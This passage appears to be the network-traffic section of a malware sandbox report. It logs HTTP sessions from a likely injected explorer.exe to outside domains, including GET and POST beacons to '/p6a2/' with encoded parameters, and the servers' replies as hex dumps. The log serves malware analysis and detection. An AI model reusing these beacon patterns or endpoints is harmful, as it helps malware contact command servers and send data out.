9d bf 0b a3 ac ad 93 e8 46 53 60 43 60 e9 94 04 b7 aa c5 db 74 32 8e 69 36 bf 61 b3 5d ec 3b 21 ed 50 40 3a 1a a6 07 a3 d9 7c 3e 81 cb 2b 9d de de f0 8f e4 91 c6 2a ac 5d 75 c7 51 a5 de 73 79 0c e8 98 c8 7a cf ca 8b 97 bc 84 aa 85 ce 61 cb e5 4a d4 17 49 32 0c c3 54 2b 42 df 23 4a c2 a6 9b 36 76 9d a0 73 d6 c5 bd 58 61 54 7d e7 d3 fb 70 0a bf b0 86 fb 51 85 45 22 2a 16 f1 8e 89 f1 18 a4 12 72 ab 3c 9b 50 27 08 2e 37 1e d8 a1 e1 d8 2b 85 1e be 99 66 0a 2c 64 50 57 c0 c0 ce 3a eb 89 45 60 d5 d7 bd 30 7b 10 46 4e 40 b0 d4 9b 86 1b 45 27 82 ed d8 4c 9c d5 60 39 ee a9 b3 bc 2c 0d 0e 38 0d 85 71 aa 8b d0 15 42 8f 18 bb d8 3f 2e ed b8 ef d6 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2C3eTmk0>Vc;uG:I8yk;,Y:=<[\}ghW0eZuTdi&G($Ok$F`pk-AIx2o&;cL6n- aHcyKn|j1~m</a-J"-[Sn-4dyKfiAL+-jjKxlhW.O!-Rm_#6d923QyzpGjeh.t%SFxJ!rq~g)D@/6DMblp|]vx)W[FU[-)gAsq-/G3zB"SX-Ey'n0e9c$Gz!2"BEy&X6c+/YrFS`C`t2i6a];!P@:|>+*]uQsyzaJI2T+B#J6vsXaT}pQE"*r<P'.7+f,dPW:E`0{FN@E'L`9,8qB?.0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.449697194.58.112.17480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:20.411514997 CET182OUTGET /p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.newhard.ru
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:54:20.472800016 CET182INHTTP/1.1 302 Moved Temporarily
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:54:20 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 154
                                                                                              Connection: close
                                                                                              Location: http://newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              20192.168.2.449715185.253.34.8180C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:34.815105915 CET219OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=guYE1BSZ9235N2CnAWofHh5ttYffxi6Or7I/zjjksNN0K1CgBVtEgiG+Hh20F/wLWeO5bKswCo7tklXGWOtZJphg6sBhJOhSXw== HTTP/1.1
                                                                                              Host: www.bip39chain.info
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:55:36.612095118 CET220INHTTP/1.1 404 Not Found
                                                                                              Server: ddos-guard
                                                                                              Connection: close
                                                                                              Set-Cookie: __ddg1_=Rurz8mBnAn33ZWVqU35q; Domain=.bip39chain.info; HttpOnly; Path=/; Expires=Wed, 27-Dec-2023 09:55:34 GMT
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 1238
                                                                                              date: Tue, 27 Dec 2022 09:55:34 GMT
                                                                                              vary: User-Agent
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px
                                                                                              Dec 27, 2022 10:55:36.612129927 CET221INData Raw: 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50
                                                                                              Data Ascii: solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2164.64.253.21380192.168.2.449716C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:42.338711977 CET222INHTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html;charset=utf-8Cache-Control: public,max-age=2592000Expires: Wed, 03 May 2023 23:41:39 EDTContent-Length: 399L_o0+;<8JhEDaUrvIl)+QZK?GZ~.]ZaGY'Qa5,9mtk/-KB.9)ST9PqV_b(+>0U[H`Q|h~i.i+U8z7:i^E+KFYE{_sPM@,V$\:!86t!>@IMx.H!CXP7@z3TZ<9o=x$E1*Y(6%g9KNa_
                                                                                              Data Raw:
                                                                                              Data Ascii:


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2264.64.253.21380192.168.2.449717C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:45.015578032 CET223INHTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html;charset=utf-8Cache-Control: public,max-age=2592000Expires: Wed, 03 May 2023 23:41:39 EDTContent-Length: 399L_o0+;<8JhEDaUrvIl)+QZK?GZ~.]ZaGY'Qa5,9mtk/-KB.9)ST9PqV_b(+>0U[H`Q|h~i.i+U8z7:i^E+KFYE{_sPM@,V$\:!86t!>@IMx.H!CXP7@z3TZ<9o=x$E1*Y(6%g9KNa_
                                                                                              Data Raw:
                                                                                              Data Ascii:


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              23192.168.2.449718192.46.208.15180C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:50.263499022 CET224OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.realtxt.co.uk
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.realtxt.co.uk
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.realtxt.co.uk/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 51 57 28 66 4f 31 62 43 6d 5a 70 46 41 63 6d 56 30 65 74 41 36 5f 71 6b 44 6b 43 31 43 4a 4c 71 6e 65 28 55 38 55 7e 55 6a 5f 43 65 49 55 66 63 52 45 70 52 74 6b 4e 6c 62 2d 71 4b 59 47 33 58 4a 77 6c 6a 34 7a 35 58 78 44 4e 44 55 53 79 31 48 2d 53 69 4a 75 6e 4a 31 6a 77 59 44 4a 49 77 65 74 63 6d 4e 34 56 4d 77 4a 74 69 4b 64 31 70 4e 55 49 37 68 31 4e 42 38 41 6a 59 77 6c 6b 76 37 61 50 42 33 75 68 50 6c 6c 44 57 4e 7a 72 36 34 62 74 78 46 47 50 77 57 4c 50 30 33 6e 6e 37 4f 5f 7e 4a 69 6d 55 39 38 52 4b 58 69 56 57 48 66 41 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=QW(fO1bCmZpFAcmV0etA6_qkDkC1CJLqne(U8U~Uj_CeIUfcREpRtkNlb-qKYG3XJwlj4z5XxDNDUSy1H-SiJunJ1jwYDJIwetcmN4VMwJtiKd1pNUI7h1NB8AjYwlkv7aPB3uhPllDWNzr64btxFGPwWLP03nn7O_~JimU98RKXiVWHfA).
                                                                                              Dec 27, 2022 10:55:50.455045938 CET225INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              set-cookie: PHPSESSID=c59c892e3774da37d881dcf5d3811775; path=/
                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                              pragma: no-cache
                                                                                              vary: Accept-Encoding,User-Agent
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              content-length: 2223
                                                                                              content-encoding: gzip
                                                                                              date: Tue, 27 Dec 2022 09:55:50 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 19 5d 6f e3 36 f2 39 05 ee 3f 30 5a a0 7e b8 48 ca 27 76 93 b5 bd 68 dd dd 45 ef 82 ee 5e 92 05 ae e8 f5 81 96 c6 16 13 9a d4 92 94 1d a3 e8 7f ef 0c 29 29 b2 e3 38 c9 5d 16 67 b4 2b 72 38 9c 2f ce 0c 67 98 fe ee 4f 9f 46 57 bf 7e 7e cf 0a 37 93 c3 bf 7d d7 a7 2f 93 5c 4d 07 11 a8 88 95 06 26 e2 76 10 e9 e9 19 a2 b8 f2 2c 4d f5 b4 4c 66 90 2a fb 2a c2 0d 8c f5 0b e0 f9 90 85 1f 01 10 34 03 c7 59 56 70 63 c1 0d a2 ca 4d e2 37 01 b9 59 23 5a 31 7c ad c4 7c 10 fd 3b fe f2 43 3c d2 b3 92 3b 31 96 10 b1 4c 2b 07 0a 37 fe fc 7e 00 f9 14 56 b7 2a 3e 83 41 34 17 b0 28 b5 71 1d ec 85 c8 5d 31 c8 61 2e 32 88 fd 64 8f 09 25 9c e0 32 b6 19 97 30 38 88 86 eb 42 76 05 a9 29 c5 6e 59 76 a5 70 70 eb 52 b2 cb db 56 a5 2f 57 1f 50 23 96 be 98 60 c9 fe 1e ab 2c 18 3f e7 68 85 81 d2 7b 6c c6 6f c5 ac 9a dd 21 11 cb 55 f9 03 d3 1c 6c 66 44 e9 84 56 1d be 57 05 b0 92 4f 81 2d 75 c5 b8 01 26 b5 be 11 6a ca 26 da b0 8c 2b a5 1d 1b 03 ce 2a 95 33 ae 96 8b 02 0c 24 ec b3 04 6e 81 39 b3 64 7c ca 85 62 84 8d 34 79 e6 50 46 bf 79 a6 91 9a 50 13 9d 6c 36 c2 0d 2c 17 da e4 b6 23 4c 07 71 37 8e d9 a7 12 14 fb 68 78 59 b0 2b 3e b5 2c 8e 57 c8 94 46 97 60 dc d2 7b de da 79 2c 60 6c 85 03 22 f8 dd ce 06 f4 ca c8 0e 36 1d b0 45 b7 35 c0 a5 bb 75 49 a6 93 ea e6 c1 bd 4e b8 15 0f fc 4c e6 23 3b 05 23 c5 ec c1 9d ff df 23 40 91 a4 50 37 cc 80 44 3f e6 4a 2b 81 3e 13 b1 02 e3 77 ab 0d d0 99 6a bb 7b d5 87 f7 14 ee a7 61 a1 f6 ba 4e fc d0 31 fe a8 b5 b3 0e 8f 11 c5 43 79 46 97 97 9d 93 f4 12 6d 91 20 b5 0e 43 3e 4b 33 6b d3 71 43 28 99 09 95 20 24 0a ba 58 b7 94 60 0b 00 17 75 dd 87 d2 85 56 68 e2 4d 2c d7 37 32 72 a0 3a 8e 3d e5 6d 32 b9 02 66 60 d3 0c 4f 40 c1 6d ea c9 78 79 5e 8e 45 47 ed ac d1 c3 b6 7a 7f 13 3e 13 1e 73 29 ef f1 20 53 5e 50 f6 33 90 b3 7f f0 39 0f 3e cc 3e 08 64 d8 31 6b 0d ee 30 bf 6e 91 23 66 4d f6 88 08 d7 36 bd fe 5a 81 59 7a 09 ae 51 80 7e 1a 76 bf 14 87 55 ff f9 16 1c 78 59 4a 0c 2a 0a f0 64 72 8f c5 53 98 0c 9b 10 9a 73 c3 90 1c 26 aa 87 62 f3 6d 17 d5 e9 1b 50 83 e8 20 df 3f ca 20 3f 3e ca 8e 8f 8f 8e 4e 4e 4f f6 4f 0e e0 e4 f5 e4 cd fe 9b d3 d3 a3 fc a4 d9 d4 4a d5 46 ea 13 54 4f d3 2c 57 d7 36 c9 a4 ae f2 89 c4 54 85 92 cc 52 7e cd 6f 53 29 c6 e8 a9 85 b6 a0 d2 83 04 af a1 7a 92 ac 9c e9 bb f9 c0 2f 76 cc 82 59 e9 25 58 8b 51 01 d9 0d b2 de 4f 0e 52 91 d1 a4 cb 13 a1 cf e6 d9 58 fd 31 a5 a5 28 c7 9a 9b 1c 79 21 ff 93 e4 e0 a4 03 eb c8 40 2b 2f af 78 46 97 05 60 e2 47 63 bb c3 f4 08 55 3d 5a 05 de c9 e0 17 57 45 78 4e 06 79 29 59 90 e4 9d 30 2f 7a 16 b5 b3 61 19 35 36 02 ab c2 98 57 4e 53 fe 94 e0 00 0f e7 38 39 d8 6f 90 ba 4b ab ee f9 0d 4e a9 e4 19 a4 fb c4 ff b5 1f 07 66 01 b0 c2 6d ed fe 7c c9 84 b4
                                                                                              Data Ascii: ]o69?0Z~H'vhE^))8]g+r8/gOFW~~7}/\M&v,MLf**4YVpcM7Y#Z1||;C<;1L+7~V*>A4(q]1a.2d%208Bv)nYvppRV/WP#`,?h{lo!UlfDVWO-u&j&+*3$n9d|b4yPFyPl6,#Lq7hxY+>,WF`{y,`l"6E5uINL#;##@P7D?J+>wj{aN1CyFm C>K3kqC( $X`uVhM,72r:=m2f`O@mxy^EGz>s) S^P39>>d1k0n#fM6ZYzQ~vUxYJ*drSs&bmP ? ?>NNOOJFTO,W6TR~oS)z/vY%XQORX1(y!@+/xF`GcU=ZWExNy)Y0/za56WNS89oKNfm|
                                                                                              Dec 27, 2022 10:55:50.455116987 CET227INData Raw: 92 8d 5e 8c 03 16 a4 73 30 eb c4 bb 05 c0 6f 62 c2 a4 63 3f bf 67 a7 bf b7 e9 ad e1 bb c2 40 5b bc e2 f8 2d da d2 9b cf 5b 8e 8a ea 13 5b 88 39 ba d3 6b 4c 2b ed 7c 53 02 7f 06 5d 03 16 6f d5 3a 68 8f 93 c3 16 f0 d0 dd b0 fb 1b a8 5c 4c 7e af 6f
                                                                                              Data Ascii: ^s0obc?g@[-[[9kL+|S]o:h\L~o~{?|2{QC:nbD41aj3fyA,44S#_[fi8pU9hm)9wR`n9&vyO
                                                                                              Dec 27, 2022 10:55:50.455159903 CET227INData Raw: f3 cf b7 a1 c6 ea 34 f4 3b ff 4b 3f bf f6 a8 8d b2 80 b3 f4 2a 4b 95 d9 7a 47 8c 55 1e b5 b1 be b8 f3 7f 16 fc 0b 2f 34 ce 57 26 1c 00 00
                                                                                              Data Ascii: 4;K?*KzGU/4W&


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              24192.168.2.449719192.46.208.15180C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:52.964817047 CET228OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=dUX/NCfS/ohFC7O80P17jduoKXecdoXu/c+jqkCFku2HIELrCmlysUdsWMmXDmnAL0wy8gVH6BIzEQuoLfScbNDGrSU7SZcpQA== HTTP/1.1
                                                                                              Host: www.realtxt.co.uk
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:55:53.418457031 CET229INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              set-cookie: PHPSESSID=beb728d97ac978daf2fedd2b616d8402; path=/
                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                              pragma: no-cache
                                                                                              vary: Accept-Encoding,User-Agent
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              content-length: 7206
                                                                                              date: Tue, 27 Dec 2022 09:55:53 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 61 6e 79 77 68 65 72 65 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6f 72 20 63 6f 6e 74 61 63 74 20 75 73 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 2e 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 4f 70 65 6e 20 47 72 61 70 68 20 54 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 6c 74 78 74 2e 63 6f 2e 75 6b 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 61 6e 79 77 68
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" prefix="og: http://ogp.me/ns#"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, maximum-scale=1.0" /> <meta name="description" content="The page you are looking for cannot be found anywhere. Please try again or contact us for more info." /> <meta name="keywords" content="" /> ... Open Graph Tags --> <meta property="og:type" content="website" /><meta property="og:url" content="https://realtxt.co.uk" /><meta property="og:title" content="Page not found - " /><meta property="og:description" content="The page you are looking for cannot be found anywh
                                                                                              Dec 27, 2022 10:55:53.418507099 CET230INData Raw: 65 72 65 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6f 72 20 63 6f 6e 74 61 63 74 20 75 73 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 2e 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66
                                                                                              Data Ascii: ere. Please try again or contact us for more info." /><link rel="canonical" href="https://realtxt.co.uk" /> <title>Page not found - </title> ... Bootstrap core CSS --> <link href="https://realtxt.co.uk/static/
                                                                                              Dec 27, 2022 10:55:53.418538094 CET232INData Raw: 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 69 43 68 65 63 6b 2f 31 2e 30 2e 31 2f 69 63 68 65 63 6b 2e 6d 69 6e 2e 6a 73 3f 76 3d 31 2e 30 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76
                                                                                              Data Ascii: om/ajax/libs/iCheck/1.0.1/icheck.min.js?v=1.0.1"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/1.5.15/clipboard.min.js?v=1.5.15"></script><script type="text/javascript" src="//cdnjs.cloudf
                                                                                              Dec 27, 2022 10:55:53.418565989 CET233INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0d 0a 20
                                                                                              Data Ascii: <header> <div class="navbar" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse"
                                                                                              Dec 27, 2022 10:55:53.418596029 CET234INData Raw: 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 32 30 32 32 20 26 63 6f 70 79 3b 20 2e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: "row"> <div class="col-md-3"> 2022 &copy; . </div> <div class="col-md-9 text-right"> <a href='https://realtxt.co.uk/page/terms' title='Terms and Con
